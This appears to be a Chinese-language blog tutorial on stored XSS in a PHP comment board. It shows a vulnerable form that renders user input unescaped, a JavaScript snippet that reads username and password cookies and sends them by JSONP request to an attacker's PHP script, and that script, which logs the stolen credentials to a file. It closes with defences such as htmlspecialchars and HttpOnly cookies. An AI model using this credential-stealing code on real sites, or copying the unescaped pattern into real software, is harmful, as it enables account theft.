实例"/>
XSS攻击简单实例
下面演示一个简单的留言板攻击实例
我们有个页面用于允许用户发表留言,然后在页面底部显示留言列表
前端代码如下:
<!DOCTYPE html><html><head><?php include('/components/headerinclude.php');?></head><style type="text/css">ment-title{font-size:14px;margin: 6px 0px 2px 4px;}ment-body{font-size: 14px;color:#ccc;font-style: italic;border-bottom: dashed 1px #ccc;margin: 4px;}</style><script type="text/javascript" src="/js/cookies.js"></script><body><form method="post" action="list.php"><div style="margin:20px;"><div style="font-size:16px;font-weight:bold;">Your Comment</div><div style="padding:6px;">Nick Name: <br/><input name="name" type="text" style="width:300px;"/></div><div style="padding:6px;">Comment: <br/><textarea name="comment" style="height:100px; width:300px;"></textarea></div><div style="padding-left:230px;"><input type="submit" value="POST" style="padding:4px 0px; width:80px;"/></div><div style="border-bottom:solid 1px #fff;margin-top:10px;"><div style="font-size:16px;font-weight:bold;">Comments</div></div><?php require('/components/comments.php'); if(!empty($_POST['name'])){addElement($_POST['name'],$_POST['comment']);}renderComments(); ?></div></form></body></html>
addElement()方法用于添加新的留言,而renderComments()方法用于展留言列表,网页看起来是这样的
02105935_5hbx.png
XSS攻击
因为我们完全信任了用户输入,但有些别有用心的用户会像这样的输入
这样无论是谁访问这个页面的时候控制台都会输出“Hey you are a fool fish!”,如果这只是个恶意的小玩笑,有些人做的事情就不可爱了,有些用户会利用这个漏洞窃取用户信息、诱骗人打开恶意网站或者下载恶意程序等,看个最简单的例子
利用xss窃取用户名密码
当然这个示例很简单,几乎攻击不到任何网站,仅仅看看其原理。我们知道很多登陆界面都有记住用户名、密码的功能方便用户下次登录,有些网站是直接用明文记录用户名、密码,恶意用户注册账户登录后使用简单工具查看cookie结构名称后,如果网站有xss漏洞,那么简单的利用jsonp就可以获取其它用户的用户名、密码了。
恶意用户会这么输入
我们看看 .js 里藏了什么
var username=CookieHelper.getCookie('username').value;
var password=CookieHelper.getCookie('password').value;
var script =document.createElement('script');
script.src='.php?username='+username+'&password='+password;
document.body.appendChild(script);
几句简单的javascript,获取cookie中的用户名密码,利用jsonp把向 .php
发送了一个get请求
.php
<?php
if(!empty($_GET['password'])){
$username=$_GET['username'];
$password=$_GET['password']; try{ $path=$_SERVER["DOCUMENT_ROOT"].'/password.txt'; $fp=fopen($path,'a'); flock($fp, LOCK_EX); fwrite($fp, "$username\t $password\r\n"); flock($fp, LOCK_UN); fclose($fp);}catch(Exception $e){........}?>
上面演示的是一个非常简单的XSS攻击,还有很多隐蔽的方式,但是其核心都是利用了脚本注入。
因此我们解决办法其实很简单:不信赖用户输入,对特殊字符如”<”,”>”转义,就可以从根本上防止这一问题。使用htmlspecialchars函数将特殊字符转换成HTML编码。
XSS攻击可以进行session劫持:Hack通过脚本注入到应用服务器,待其他真实用户A登录访问含有XSS脚本的网页,脚本激活,将客户的session信息发送给Hack,Hack就使用该session直接扮演用户A访问服务器。这种session劫持主要靠XSS漏洞和客户端获取sessionId完成,防范分两步:
1、过滤用户输入,防止XSS漏洞
2.、设置sessionId的cookie为HttpOnly,使客户端无法获取
更多推荐
XSS攻击简单实例
发布评论